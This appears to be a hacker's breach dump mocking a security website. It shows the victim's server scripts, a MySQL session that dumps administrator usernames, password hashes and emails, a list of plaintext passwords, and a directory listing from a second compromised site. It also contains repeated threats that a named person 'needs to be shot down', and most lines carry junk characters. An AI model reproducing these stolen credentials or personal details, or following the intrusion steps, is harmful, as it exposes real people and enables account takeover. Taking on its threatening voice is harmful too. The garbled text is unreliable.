<channel>0 h, g3 j* p$ u D- J4 @: \; q
<title>ASTALAVISTA.com - Exploits</title>4 O' i- w5 ~3 B; E& m, o
<link>http://www.astalavista.com/exploits</link> `( G! ?" r+ s4 d) j% X1 ^% d- B
<description>All availably Exploits.</description>
& S9 ], Z' S5 ]3 d3 ] <language>en-us</language>
5 E4 Q& c1 E& Z1 U8 W3 Y2 _; A <lastBuildDate>’ . date(’F, j M Y H:i:s O’) . ‘</lastBuildDate>7 p( v# k u7 g: H8 g; e/ H
<docs>http://blogs.law.harvard.edu/tech/rss</docs>- U$ l1 D% K0 O; W
<generator>Astalavista.com</generator>; M) o' ]6 }5 \0 S3 @7 U1 i
<webMaster>info@astalavista.com</webMaster>’ . $items . ‘
8 m: J0 T$ q! q1 m& G) u% |5 R </channel>" S# G5 p y) h5 ^9 ?2 `
</rss>’;( q, I% R z6 x" L) |9 U
0 `% e* K. L5 f1 B
if (file_exists(FULLPATH . ‘/feed/exploits.xml’)) {2 X1 R# Z5 |' C5 G" U
unlink (FULLPATH . ‘/feed/exploits.xml’);
2 b; s" w+ i, E }2 [- ?8 G2 e; L( s
+ G6 C! v9 p. P4 ?$ R6 [# P# n
file_put_contents(FULLPATH . ‘/feed/exploits.xml’, $xml);
' D! d, b3 M' O3 p6 C[snip]
$ T6 x7 j- y4 K* K% |7 T1 u% ?8 H" O& z) c; ]% }; d
sh-3.2$ cat exploits.sh& i" }- F* I1 B, Y( o
#!/bin/sh5 H) K1 Z2 E2 k4 j% b/ U6 t6 O1 s+ k
+ C$ s* j' R9 \8 |% k* N
###########################################################; Z! ?( B8 o; v( C# {1 }/ G
# # I) f7 u. ~* D' Y7 d
# Title: milw0rm exploits adder #
" k1 i3 Q% `* [2 W5 g1 E( u# Description: Add all milw0rm exploits to the #7 g; q' B' ?7 A& r" E
# Astalavista.com database #
$ j3 Q; n$ ~. V# #9 |) X: H) h9 L2 ~8 x3 e4 E7 ~
# Company: Astalavista Group #
. ]5 D* ~/ J0 V* \3 G) _3 O: I# Author: Paulo M. Santos #% o, B0 o: ]- c
# E-Mail: 链接标记paulo.santos@astalavista.ch #
+ ?- Q8 p4 D1 K; @ M# #
8 Z: r4 H2 E8 _; B4 {###########################################################
* B, e" C9 S; D7 ~
5 f1 M- Y9 n" j# path# j+ @8 o: S W: @9 {: T
this_path=/home/com/public_html/modifications/cronjobs
5 A- O# u, @1 K) ^& p8 w" s/ d1 H- @# \
# change directory& E- e% O! e& w0 @6 U3 c7 K' @
cd $this_path' s- w& F O/ T; u. @* `' R
cd tmp/6 J1 ~+ N& k; o6 v. m: R
: b8 @: T5 L8 v# k' w
# delete files
1 _5 \, ?9 W" W; n5 a' l2 Grm -rf milw0rm.tar.* &( u s3 a7 X* t
rm -rf milw0rm/ &
0 h; Z. M- U1 y. z* u) c, G V
4 ]0 V! S7 A. @ P1 m$ N# wget milw0rm paket
; [, f6 F& W+ b8 {wget 链接标记[url]http://www.milw0rm.com/sploits/milw0rm.tar.bz2[/url]
$ L1 a" r) X1 T& e: ]3 o
. Q+ E: P. W% _# extract milw0rm paket% G1 T3 m+ g5 Q4 |' E6 Z. H" d
tar -xvf milw0rm.tar.bz2
# V( m* L2 q9 `# M$ i0 w& y2 ]( ]- ^0 e0 U
# change owner; W) o4 D0 L }$ z& f6 l
chown -R com .! A: R) {/ B+ R0 r
chgrp -R com .
1 a! ]! R0 r0 i
+ S+ W4 \( O( R4 M$ E# execute php script
" Y* I1 M. N6 m1 h* T. |cd $this_path+ [/ I1 e0 R+ V5 A
php -q exploits.php
/ o1 a8 F4 Y- e( N/ w8 l2 t. b* x6 j+ ?; d
# delete files0 o9 M0 q8 \, Y0 J; ?- Z1 I4 D
rm -rf tmp/milw0rm.tar.*! ]' _# a8 d2 h/ C* B" u- i5 n
rm -rf tmp/milw0rm/
/ l' V9 L9 D# p n! @ c* g1 d/ S
' ?% J, u) A+ v' n' h6 Dsh-3.2$ echo “Paulo M. Santos needs to be shot down.”- Y5 b+ Y& v7 \0 F1 W; A* P
Paulo M. Santos needs to be shot down.9 u4 N. A4 J4 V5 {* _- a
# y3 h$ V2 i7 F( a8 _
mysql -u contrexxuser2 -p
/ k& \' S& u8 n- [& I& @6 yEnter password:* h, \! R1 y1 b5 f: Z; M6 R! l
Welcome to the MySQL monitor. Commands end with ; or \g.
4 |; X1 f D2 g) ^% ^4 c2 MYour MySQL connection id is 261694
; |" L2 F1 Y6 K ~8 u; w L" DServer version: 5.0.45-community-log MySQL Community Edition (GPL)- V1 r0 O" P0 K+ [- y
; _/ F) P2 D, `; F. S1 _0 u, l
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer." ]8 q" c" X! Z4 M% R* B
4 v8 o: a* S' V: N e0 w( W7 hmysql> show databases;
5 x$ f5 y! j2 y& p* T5 e; n+——————–+
0 U; r5 S5 y/ ~| Database |7 k* }0 h4 ]) z w8 f
+——————–+
9 N' h* I) s5 J, C) U- t4 F. ~| information_schema |' m: n! a4 |& M, {
| com_contrexx2 |
: v3 e6 Y# O O" ?| com_contrexx2_live |4 @, W3 n, ~- y' S/ y9 w4 U p4 j
| test |8 d) p: e3 b3 e$ D) V* \0 g
+——————–+
1 B8 ^ j" y7 }/ d4 rows in set (0.00 sec)! v# r) x5 r# e! @, T
6 h% p* A- @$ ^9 C- \/ D" n
mysql> use com_contrexx2_live
4 p# k, Q0 \- {4 {* T# @Database changed
# l+ m0 x; H; k/ y7 jmysql> show tables;: b1 Z+ Z# a- ^, {
+————————————————–+
: ~* r+ w { C: C: s+ P7 ^2 L| Tables_in_com_contrexx2_live |
( C3 M% }- g& P, G; \6 B5 @ G8 [+————————————————–+
" b5 N6 Q3 Y' A: s| cc_banner_counter |7 [: Q# h( S M6 P6 x
| cc_search_counter |
4 w8 b# `9 l8 z) |& k0 S2 ]| contrexx_access_group_dynamic_ids |
5 e( H& o& x! Q# U8 w| contrexx_access_group_static_ids |
0 j# i3 F; h7 E: h- s| contrexx_access_rel_user_group |
9 n! S' f) u- K+ ^% W| contrexx_access_settings |2 I; _3 E+ L; I2 J; W ^
| contrexx_access_user_attribute |
8 _+ H0 t+ o# C2 a i| contrexx_access_user_attribute_name |
, N3 m n4 L% E| contrexx_access_user_attribute_value |
) v! j# t+ i7 x* j4 G6 h3 @| contrexx_access_user_core_attribute |5 V% x9 l+ q/ Q& J& D
| contrexx_access_user_groups |6 m: B, D! C8 G+ e, u9 M4 ^
| contrexx_access_user_mail | i4 d0 W8 _* x
| contrexx_access_user_profile |, L% C" ]. [0 {- R& O, W/ O
| contrexx_access_user_title |* N& [2 o9 }% J# U; g& O7 i& @
| contrexx_access_user_validity |
: K$ [- _3 S+ j" P& q. @$ u' `| contrexx_access_users |
6 n2 [4 X" B6 J3 @, j0 a| contrexx_backend_areas |) f7 R: A3 n6 M! I3 g/ _6 s
| contrexx_backups |
/ W7 Y: O, b3 {, s6 k| contrexx_content |
4 k% C. k7 y, n8 ^& ~& Y5 d) I| contrexx_content_history |5 b |" N9 Z% y. L
| contrexx_content_logfile |
4 F! L; a. c# _| contrexx_content_navigation |
) o4 L- M) k( M# N| contrexx_content_navigation_history |
+ F4 e( m* H/ U% F$ X+ @| contrexx_ids |
$ T5 k! _* M0 J& i2 R" h. x, R| contrexx_languages |
% p( k y- o8 N; F, y" f| contrexx_lib_country |) v, ^+ y4 M' H! |- t$ x* C% n+ ~
| contrexx_log |& U/ ?" B% I% R6 y7 x& J; A& ^
| contrexx_module_alias_source |
) P }* E) ?- C X) P5 \$ E9 m5 F m| contrexx_module_alias_target |$ O( C& ~. m# k v4 y7 y2 [, U9 j
| contrexx_module_block_blocks |
; N8 k' W3 T4 m# C9 q% A| contrexx_module_block_rel_lang |. K5 D" x5 U7 r0 p9 U& I5 a
| contrexx_module_block_rel_pages |1 Q0 W8 t' F- h/ Y' B3 i7 b
| contrexx_module_block_settings |
: c7 h) V; Z" O* x$ k! c2 t| contrexx_module_blog_categories |# g3 ]0 a5 I- w& a d; W
| contrexx_module_blog_comments |
9 n5 P5 b3 `7 ~0 ]| contrexx_module_blog_message_to_category |4 X+ [# n: ~4 C) F P
| contrexx_module_blog_messages |! _0 N6 ?9 c( T& P3 d
| contrexx_module_blog_messages_lang |
- E3 v; T4 ]; B* |8 Z| contrexx_module_blog_networks |
& |9 N" {, h9 i# ]; m, \| contrexx_module_blog_networks_lang |+ ^$ {. W o. B
| contrexx_module_blog_settings |
' C2 K: g ]" m! k| contrexx_module_blog_votes |
. \8 W+ f3 P) x7 D& M7 S0 W% Q7 f$ C| contrexx_module_calendar |
$ i% t9 f* U, s5 b! P| contrexx_module_calendar_access |
- e. I2 g2 i) k: {7 c3 o% a7 r. y| contrexx_module_calendar_categories |& N6 ^+ V( i0 B
| contrexx_module_calendar_form_data |$ J7 m0 L X* p. O, N
| contrexx_module_calendar_form_fields |
5 g% b0 U: l9 t0 I| contrexx_module_calendar_registrations |
/ v) f9 M' ?2 Z" A" M| contrexx_module_calendar_settings |# Y; a& B/ B2 s/ C6 P
| contrexx_module_calendar_style |
9 S9 F9 \% n" r8 |% w1 B8 i2 V' }| contrexx_module_contact_form |0 }6 S9 v% ~' T: S, d
| contrexx_module_contact_form_data |
9 h' A- N9 r1 X| contrexx_module_contact_form_field |1 E. x' `1 J$ p' i; F; u
| contrexx_module_contact_settings |
S4 M# Z) k- }, n- R p| contrexx_module_data_categories |
% s1 l ?6 i+ L, F+ Q" ?| contrexx_module_data_message_to_category |8 `8 T* d( [ x/ q" Z$ x7 e2 m
| contrexx_module_data_messages |2 m- R3 Q, j- y$ S& L/ D) c
| contrexx_module_data_messages_lang |
, I7 e0 c' I7 z* [4 z% C @| contrexx_module_data_placeholders |
8 m6 j/ m' d% r; ^| contrexx_module_data_settings |
6 {: b2 b0 t1 b' w9 m# B| contrexx_module_directory_access |
! v; R& M2 i& {5 z3 s4 ?2 N7 t| contrexx_module_directory_categories |
" Y/ ~4 ]! ^) d3 C0 T, F| contrexx_module_directory_dir |* w9 J) U4 |( P. B; K
| contrexx_module_directory_inputfields |
; B4 {6 I8 H5 x| contrexx_module_directory_levels |! r7 M5 O8 a# |. B7 O& a' e
| contrexx_module_directory_mail |- T/ L* }4 K- t5 D0 _) r0 Y
| contrexx_module_directory_rel_dir_cat |
9 L" |" ~% y6 [' ?# L& b| contrexx_module_directory_rel_dir_level |
! C5 j# [1 o! [; Y* T' _1 y5 a# c| contrexx_module_directory_settings |
+ o- b8 u; {7 U5 K| contrexx_module_directory_settings_google |
% X- _% s( ?( `! V8 @9 z1 W, {, h| contrexx_module_directory_vote |
2 e$ Q3 u+ l* z. ^| contrexx_module_docsys |
' v) F- e' H4 T; }3 P| contrexx_module_docsys_categories |
1 d& K+ @9 A) G: T| contrexx_module_egov_configuration |
* U. e) E9 b# n3 t; Q| contrexx_module_egov_orders |* a( J4 R4 I |5 R2 S$ s
| contrexx_module_egov_product_calendar |
6 T- T' O" C0 i+ g| contrexx_module_egov_product_fields |% T) c ^2 o8 }2 d* \
| contrexx_module_egov_products |
( h. f0 F2 Y( a9 s| contrexx_module_egov_settings |- t$ q+ G6 p; W6 q+ u% S# B& h
| contrexx_module_exploits |
6 O ?, J3 b! z| contrexx_module_exploits_categories |' F! q3 N: `/ k" Y6 t
| contrexx_module_feed_category |6 C3 e! |$ W% n U! A! ?2 W- D
| contrexx_module_feed_news |5 }, ]" I4 ?5 n7 V! @* L9 C- J) L! V
| contrexx_module_feed_newsml_association |( u: S- s, F5 E- D5 v, V
| contrexx_module_feed_newsml_categories |/ H1 z6 G+ h q, j* W( p ?$ s
| contrexx_module_feed_newsml_documents |
' T6 O& g0 O9 i! {7 a5 M| contrexx_module_feed_newsml_providers |
. o8 \! z# Y/ s& s) g" w4 H& m6 k| contrexx_module_forum_access |% f' k7 t* v h. ?
| contrexx_module_forum_categories |% v k6 @! Y" }: q
| contrexx_module_forum_categories_lang |
6 b' n/ C( U8 L8 S& M) [) [% Z$ H6 \0 x| contrexx_module_forum_notification |+ N3 t* A0 a5 I7 b& Y
| contrexx_module_forum_postings |7 v! d6 G* q$ l" `* P! ?2 [( v- C
| contrexx_module_forum_rating |% g4 e* ]! ]' _; h/ _# S. l
| contrexx_module_forum_settings |
1 z/ P1 W- Q6 M2 S) w0 C D* e| contrexx_module_forum_statistics |
" F9 B6 Z1 t0 u! V7 g' C* b| contrexx_module_gallery_categories |
& d( L8 v- L9 t2 o4 q| contrexx_module_gallery_comments |
# m3 W/ Z0 a7 o3 h: v# R0 q| contrexx_module_gallery_language |
; c5 r- e# V. ]: f4 ]& g8 ]; h* p| contrexx_module_gallery_language_pics |0 C/ {% b9 E: i. e( I; x( ~% Z
| contrexx_module_gallery_pictures |
' A" G; I! d5 n$ j6 F6 ~/ A5 W. {| contrexx_module_gallery_settings |3 ?5 d) c& n& ^
| contrexx_module_gallery_votes |5 }3 l, C! {1 |/ ?" p4 v! S
| contrexx_module_guestbook |$ V5 g6 {" | u1 b- @. O+ F: T1 \
| contrexx_module_guestbook_settings |7 v( v3 c2 U, z) Z' c
| contrexx_module_livecam |
9 a+ h+ @' S* I9 t6 J| contrexx_module_livecam_settings |8 W- P# X; t% ?9 a% ~3 B( J
| contrexx_module_market |# J2 @8 k M5 l3 }5 d1 _: C
| contrexx_module_market_access |
+ F( ] O" G M! H' |6 H| contrexx_module_market_categories |; e' k* h9 u" s3 k0 H f- t
| contrexx_module_market_mail |+ q% k4 Z% y3 |- L3 R* ~ [) z
| contrexx_module_market_paypal |4 J) e6 d- i2 f& F
| contrexx_module_market_settings | C& {) m% X4 c7 Y
| contrexx_module_market_spez_fields |
- a/ t/ r( n7 f. }& x. x/ o| contrexx_module_mediadir_access |% T2 ~ ~! X. ]% P1 A
| contrexx_module_mediadir_categories |
. T4 d: w1 ]* K3 S5 C, D8 }| contrexx_module_mediadir_comments |$ H. ~; H1 s4 ]6 D4 H7 a, W
| contrexx_module_mediadir_dir |
8 i7 Y0 V+ O0 k6 Q+ u8 Z% a| contrexx_module_mediadir_inputfields |
* A8 m2 `( l+ `. u| contrexx_module_mediadir_levels |+ `# d. V- T# b9 o. o2 Y$ o
| contrexx_module_mediadir_mail |
9 P( H& Q4 d( |/ t0 J N| contrexx_module_mediadir_rel_dir_cat |
, Q3 e; Q. Y( _) a/ e# |# j| contrexx_module_mediadir_rel_dir_level |
$ Y+ V4 ~# d4 g: B ^| contrexx_module_mediadir_reports |
2 H# O* l6 ?$ l" t0 H$ G| contrexx_module_mediadir_settings |% \4 f& o6 P" L8 h/ u. Z
| contrexx_module_mediadir_settings_google |
* V$ b& F3 Y0 N; ]/ x| contrexx_module_mediadir_vote |
' o! y3 W1 ?* n1 \2 m| contrexx_module_memberdir_directories |9 |1 F% n7 N* d# p
| contrexx_module_memberdir_name |: ` y: z. J. _
| contrexx_module_memberdir_settings |
' l m9 r! v/ o/ V. Z( V3 V( \) w| contrexx_module_memberdir_values |! Y! _$ K2 u# |0 u
| contrexx_module_nettools_allowed_groups |
. n9 e5 C" Q; G5 P1 M| contrexx_module_nettools_settings |
/ V o! t) |4 S' b$ {0 L/ y& r| contrexx_module_news |
: a: }: k# D! v| contrexx_module_news_access |+ o& a' K/ B3 M j
| contrexx_module_news_categories |. I. ^ C: j4 X& z4 E
| contrexx_module_news_settings |+ \: X# N% Z- o7 c: E6 w5 |3 L* E
| contrexx_module_news_teaser_frame |# v; I( W* d0 e, o
| contrexx_module_news_teaser_frame_templates |
; v% R' s3 z6 \| contrexx_module_news_ticker |
& V( ~6 F" g5 v* D| contrexx_module_newsletter |
- j& n/ ?1 r/ ], `6 q9 q6 [| contrexx_module_newsletter_attachment |
% @6 M e+ Z- ~" E, B| contrexx_module_newsletter_category |
- I) B. A3 K0 {| contrexx_module_newsletter_confirm_mail |# Y) b& D, m9 M% d+ f
| contrexx_module_newsletter_rel_cat_news |' d7 ^7 t& O9 P6 D+ g3 E+ v+ }" B# X
| contrexx_module_newsletter_rel_user_cat |+ d, S. c- I5 v) t+ k! T$ |( Q
| contrexx_module_newsletter_settings |
6 \7 x6 ?1 b5 Z| contrexx_module_newsletter_template |
+ ^% U3 y X# P' F| contrexx_module_newsletter_tmp_sending |: Y9 d7 m3 X& u Q% g; L$ c
| contrexx_module_newsletter_user |
; _: j, g; I/ M/ y& T| contrexx_module_newsletter_user_title |& U/ ~ s$ E1 w) @& h8 c( i
| contrexx_module_onlinetools_defaultports |
- Q. L& Y& g4 p1 ^: n0 Q7 L| contrexx_module_onlinetools_defaultports_back |' i9 W7 ?, w( g3 m) g {) D% d
| contrexx_module_onlinetools_geolitecity_blocks |0 S! P5 o3 y4 q
| contrexx_module_onlinetools_geolitecity_country |! a* H! I( ^% C9 c8 T6 e+ [
| contrexx_module_onlinetools_geolitecity_location |
( p [2 Q% T5 } a5 T| contrexx_module_podcast_category |8 O1 P% F+ w) @ s% B. f9 ~* |( q: a
| contrexx_module_podcast_medium |9 u$ I8 Z; p- j* o
| contrexx_module_podcast_rel_category_lang |
& E! L4 V0 _. I) H0 f; S| contrexx_module_podcast_rel_medium_category |
& `' u- m K2 F- G& U* K* u0 Y| contrexx_module_podcast_settings |
. v! x6 F! W! t3 v) S, Q9 U' W| contrexx_module_podcast_template |6 V5 I3 ]+ k2 f0 a6 k2 y T2 L4 u) T
| contrexx_module_proxydb |& Z7 I- I8 r- ?
| contrexx_module_recommend |9 t# N1 G s2 h! |# d
| contrexx_module_repository |, [; e3 ~3 N; Z# B2 S* a
| contrexx_module_securitynews_cats |4 o. |" m P3 V7 s) l" [
| contrexx_module_securitynews_feeds |$ x( j5 r- _7 q' x3 z7 Y3 l& s
| contrexx_module_securitynews_news |
8 j4 j+ A7 Z/ }" g, J| contrexx_module_shop_categories |
; t5 c/ _+ e( `$ C+ T: C| contrexx_module_shop_config |6 n! ?1 {0 \7 V6 K' ]1 o
| contrexx_module_shop_countries |/ R/ R& t2 z4 `( F2 ^& @
| contrexx_module_shop_currencies |
: B- n* @: A. x' s3 ]4 ?| contrexx_module_shop_customers |# G% q4 J6 c5 l( d
| contrexx_module_shop_importimg |/ K% T/ A* ^; k& u- w
| contrexx_module_shop_lsv |
% V- [7 J2 X0 B+ a7 m| contrexx_module_shop_mail |3 y+ S# I5 C% l. l0 ^8 f
| contrexx_module_shop_mail_content |
& n% i& \: t% }3 w| contrexx_module_shop_manufacturer |& E" A9 ?. s( o; N
| contrexx_module_shop_order_items |
3 P0 Y- N/ y, K% c) S| contrexx_module_shop_order_items_attributes |3 d& t5 T9 x) U( W
| contrexx_module_shop_orders |
, Z9 q1 A0 b S8 |$ L| contrexx_module_shop_payment |3 u, Y" N$ V, T N4 F: M6 P# W- }, y
| contrexx_module_shop_payment_processors |
0 O( n' g: X$ g| contrexx_module_shop_pricelists |- Q: R) X+ G7 [3 x* D. d% _9 w8 ]- F* P
| contrexx_module_shop_products |
X* t) V7 V2 J. _& u| contrexx_module_shop_products_attributes |0 M# _8 v1 K9 ]9 H1 p) U1 F
| contrexx_module_shop_products_attributes_name |
. d" J1 s$ L( x0 \% A| contrexx_module_shop_products_attributes_value |, R6 H; c# A( k' J" R- _& l! l8 m5 M
| contrexx_module_shop_products_downloads |
5 ^2 W' ~1 }; w8 w| contrexx_module_shop_rel_countries |9 {9 Z) \. O: b! ]0 |
| contrexx_module_shop_rel_payment |. k; i+ f! B9 k
| contrexx_module_shop_rel_shipment |! n$ p/ |. I' ~9 L7 y( m
| contrexx_module_shop_shipment_cost |/ V8 G5 K. e% h8 ]9 z
| contrexx_module_shop_shipper |" o7 b; [) z' W
| contrexx_module_shop_vat |
3 o2 [9 m/ F( h' S. I: j6 |" h! t| contrexx_module_shop_zones |
; J- I* ^8 _% u4 o1 I| contrexx_module_u2u_address_list |
' y! [ V% `1 ?2 y% e| contrexx_module_u2u_message_log |
. b4 u- B* P! ^$ k+ S5 i| contrexx_module_u2u_sent_messages |
" Q4 K! [1 m4 q6 p| contrexx_module_u2u_settings |" g3 d: t; X0 R
| contrexx_module_u2u_user_log |
. k6 B. H; p* D4 d8 _* A| contrexx_modules |
. C+ I9 ]& O; x s6 h4 u( X| contrexx_sessions |
) @% D% ~8 H, @/ x& x% ]! Y2 y( v| contrexx_settings |' l7 M1 m7 m- M8 @2 p
| contrexx_settings_smtp |) T2 ]4 m8 X" y. M" |
| contrexx_skins |2 F- L# `4 v8 E: f
| contrexx_stats_browser |
* d5 ?; g6 ]( b+ ?. W| contrexx_stats_colourdepth |9 \) o: G/ A6 F+ n
| contrexx_stats_config |
, o- n0 |3 x% T5 t! j| contrexx_stats_country |
4 I+ P0 x& k* M' B- z' q+ f| contrexx_stats_hostname |
/ n' E, T+ E8 B6 h% K5 R1 x/ Z| contrexx_stats_javascript |9 `6 {; C% `7 p9 P5 Q$ s! E
| contrexx_stats_operatingsystem |
% o+ A! s. ~, g* Z+ G6 _$ ]; h| contrexx_stats_referer |
5 c4 ]5 l, J" c4 P: m; \| contrexx_stats_requests |
) f4 |3 O' Y+ |3 E8 q' {$ t- F0 V| contrexx_stats_requests_summary |
% Y! g i2 V4 \5 D, L$ j| contrexx_stats_screenresolution |
6 D* d f4 k. T2 f* J' P, K| contrexx_stats_search |
1 I% j& J& d! R Q5 a| contrexx_stats_spiders |
# m- {% G8 h; z2 j| contrexx_stats_spiders_summary |/ J `2 f. H6 U4 ~3 @
| contrexx_stats_visitors |, p7 H- D. g1 s3 W N' h% ~8 X& s
| contrexx_stats_visitors_summary |& B) Q2 ]1 |6 t# n2 a6 n- M- ]. \
| contrexx_voting_additionaldata |
- {: l: ?' X$ d9 D0 q6 o# s) g| contrexx_voting_email |
1 c/ c8 A: T" T* O* Z. v5 w| contrexx_voting_rel_email_system |
6 ]6 b) k7 }) V" \+ o" I2 g| contrexx_voting_results |& a5 _3 ~* a* h: ?
| contrexx_voting_system |8 Y4 |9 }* v. \; S, P2 ?) W& d& J
| foo |5 z+ m% n( g" z
+————————————————–+
R7 h. M( n! s- P227 rows in set (0.01 sec) |0 ]( H3 l4 ~- `. l. |; {. q: h
+ \/ [* C: O! |( Z" g g) x$ K
mysql> select count(*) as skids from contrexx_access_users;
' x- n) J1 y% u' Z+——-+2 a3 ]/ r& a$ v p1 J n7 x) X
| skids |( a8 Y/ P# d' k5 G
+——-+8 S5 ?# \* H @) U
| 53699 |
8 d3 p# j/ o& \' b' y" T# f8 q0 _+——-+
+ b6 o5 k: C& y5 n' Z1 row in set (0.00 sec)
& t! p8 \- |- Q6 u+ g2 J( T9 ]2 F& b5 P) V
mysql> describe contrexx_access_users;$ O" {, ^% y. i: Y, p
+——————+——————————————+——+—–+————–+—————-+
7 J4 R/ c1 n9 k: D( m N| Field | Type | Null | Key | Default | Extra |0 c1 t8 r0 u# k6 K1 u1 l
+——————+——————————————+——+—–+————–+—————-+5 v* n5 W' l' g2 t- l
| id | int(10) unsigned | NO | PRI | NULL | auto_increment |
" V6 N3 S; V/ \6 \( {) R| is_admin | tinyint(1) unsigned | NO | | 0 | |
5 [8 ?# x& X9 j! k! t| username | varchar(40) | YES | MUL | NULL | |3 y7 m7 r6 |$ }
| password | varchar(32) | YES | | NULL | |
) m) l( q; T+ G3 ]/ V| regdate | int(14) unsigned | NO | | 0 | |
8 k( f3 M% M4 W' ^! ]0 [0 F| expiration | int(14) unsigned | NO | | 0 | |
& E( t% H4 F5 F0 g/ E6 K+ J| validity | int(10) unsigned | NO | | 0 | |
, }6 H& n1 t8 l8 U. U| last_auth | int(14) unsigned | NO | | 0 | |. H+ [" u9 H" X7 u8 a4 S j# ]# q
| last_activity | int(14) unsigned | NO | | 0 | |
$ A7 W* X5 h" ` R$ k' {| email | varchar(255) | YES | | NULL | |. n' p1 T0 A1 S* W
| email_access | enum(’everyone’,'members_only’,'nobody’) | NO | | nobody | | I$ r' v0 r* x5 @) F# x `
| frontend_lang_id | int(2) unsigned | NO | | 0 | |/ l# N9 R0 A$ X- E
| backend_lang_id | int(2) unsigned | NO | | 0 | |
$ U# E5 ^* l/ `| active | tinyint(1) | NO | | 0 | |% u# H9 o5 {" k& F' [6 o1 N/ j
| profile_access | enum(’everyone’,'members_only’,'nobody’) | NO | | members_only | |
% G! O0 z5 e; |( \# v2 L, f| restore_key | varchar(32) | NO | | | |* b$ t4 P8 c9 P8 ?2 s1 {& B
| restore_key_time | int(14) unsigned | NO | | 0 | |, {3 B5 M8 _9 c" H+ x
| u2u_active | enum(’0′,’1′) | NO | | 1 | |" b" g8 B9 k1 d: g4 B, b
+——————+——————————————+——+—–+————–+—————-+
( w6 e9 w/ s2 b( S" Q6 `: W18 rows in set (0.00 sec)
# L$ o7 L: Q- ^0 z+ K) S0 ]& @" K1 f7 x% A
mysql> select username,password,email from contrexx_access_users where is_admin = 1;- S( H& S6 V' S S
+————+———————————-+—————————–+/ |+ C. M5 z2 t9 L9 l
| username | password | email | b! _& z7 l8 o- A9 o
+————+———————————-+—————————–+& U) U' _6 ?+ J D* n0 y
| system | 0defe9e458e745625fffbc215d7801c5 | 链接标记info@comvation.com |6 F3 q6 P+ Q6 _* j% l
| prozac | 1f65f06d9758599e9ad27cf9707f92b5 | 链接标记prozac@astalavista.com |. W0 W- }2 A3 G! W* e
| Be1er0ph0r | 78d164dc7f57cc142f07b1b4629b958a | 链接标记paulo.santos@astalavista.ch |
c) g. C/ L0 r; a1 {/ S8 ~/ S6 l| schmid | 0defe9e458e745625fffbc215d7801c5 | 链接标记ivan.schmid@comvation.com |
6 o& \0 W2 K8 B' I+————+———————————-+—————————–+
' { s. ]: A) `4 rows in set (0.04 sec)5 ^2 g7 i3 z5 u" E1 P
0 c5 C% S) w& D/ o
mysql> exit;( ~/ W* u. v3 F/ g1 P+ f
Bye" }" I3 [8 Y K5 l
5 a7 E/ R. Q" L& O+ P[~] There you go, your “team of security and IT professionals” is a joke.
8 N3 W5 A: z2 Y3 _& t) U& U0 P+ p
+——————————+) K0 X8 x; |% a) v. E
system:f82BN3+_*( M( e D; s! c: N' W
Be1er0ph0r:belerophor4astacom' Y% ?9 n' x d" c) |& w
prozac:asta4cms!0 S" A \) P6 g1 Q4 ^
commander:mpbdaagf6m+ J3 |4 g/ Q; C* F# g
sykadul:ak29eral
0 H6 S$ v# h3 f+——————————++ L7 p# U; T3 P1 A4 u: C
' T4 I7 e, g0 l) l[~] Paulo M. Santos AKA Be1er0ph0r needs to be shot down for his milw0rm ripping script(s)4 v" V. S& O( U/ M- ~: @
…and the others, find another area to get paid from, security isn’t for sale and you obviously fail at it.
" v5 p- f o8 L, ]: n v2 F2 ~7 B( [( O, q$ y
[~] Lets move to astalavista.net now,# g! v5 E: @# t8 _7 g6 G
* O* |: E# v/ P$ W- IFrom <链接标记[url]https://www.astalavista.net/[/url]>:
* A! k4 H9 F& P>> Everyone knows that the best defense is a good offense.1 h9 a# R2 F7 e! l [2 }" z9 N
>> Those who wait for their foes to find a security loophole are opting for the wrong strategy.5 C" R. Z F. J! Q+ C7 v
>> The ASTALAVISTA hacking & security community is the largest IT security community in the world.; F7 F' t5 N% B0 G; F& E0 P
>> It.s a platform for both IT specialists and novices, and anyone interested in expanding and updating their knowledge regarding IT security and hacking.”9 p- K! H; a3 @# J5 ?5 Z
. k" A- V. @6 N+ r>> Go ahead, try and hack our server . in a completely legal way!. V6 Q0 |. C! Y# u9 \& Y* D
>> Learn by doing: We offer our members tricky tasks and challenges on an
- p+ x2 C, j" x1 X8 j>> ongoing basis so you can test your knowledge and abilities. You can also
5 A/ c1 T0 |: m2 {0 k% F' P: o>> demonstrate what you.ve mastered by taking part in regular hacker contests
$ V- R5 b) o E) u3 f- X1 w5 s>> and war games
/ a% `2 [- E% o- l A7 \4 B- V5 W
6 i2 t H' @2 J- u1 I[~] Lets take a look there, after all… they are hack-proof, aren’t they?!5 g' J5 Q+ K( L Y% W
% j7 i7 d9 {/ ?, m5 N6 R
[-] Tricky task: Find home dir of astalavista.net
( l7 m/ i9 L7 C. u, D6 c% O2 e5 g: b& a$ |; l7 S, w
sh-3.2$ ls -la ~astanet1 Q) t9 k3 O1 u* o2 W, c, {
total 481 X2 z! j" k0 o- S
drwx–x–x 6 astanet astanet 4096 Dec 23 15:55 .
! K3 g. T& |% [' Xdrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..$ z. {3 t$ e) E1 K* R! M
drwxr-xr-x 2 root root 4096 Dec 23 16:00 auth/ E( v' t2 x% o* N+ s. w" Z
-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history
" I6 T( ~) t& s1 `& x& V- e/ k( L7 m-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout
" u# ~4 N5 y0 G) q-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile
/ i2 Q5 V8 P4 ^3 r! n( U* f-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc0 ]+ A# k! h7 j6 \
drwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains4 W6 d* G- t3 h4 l: T% g4 O
drwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap
$ O, U' N. T: l4 m& Hdrwx—— 2 astanet astanet 4096 Dec 23 12:18 mail
$ K6 Q, K" q# k/ }1 plrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html" x$ \1 i' }) o/ x' n
-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow
" l2 K+ |1 l7 r/ p3 B$ r9 C- r
" J. _, p- U3 ^/ b2 f. l' Ush-3.2$ cd /home/astanet/domains/astalavista.net/private_html/
5 T& g) S6 g4 G+ p5 T5 c Psh-3.2$ ls -la3 P" n# h0 O( p+ G
total 200
